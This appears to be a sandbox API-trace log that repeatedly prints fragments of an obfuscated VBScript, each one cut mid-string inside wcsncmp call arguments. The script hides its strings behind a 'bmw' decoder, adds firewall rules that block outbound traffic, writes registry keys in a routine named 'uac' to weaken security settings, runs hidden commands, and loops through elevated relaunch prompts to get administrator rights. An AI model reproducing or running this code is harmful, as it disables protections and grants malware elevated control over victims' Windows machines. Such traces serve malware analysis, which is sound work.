newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0226.336] wcsncmp (_String1="CRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.336] wcsncmp (_String1="RDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.336] wcsncmp (_String1="DQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.337] wcsncmp (_String1="QFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 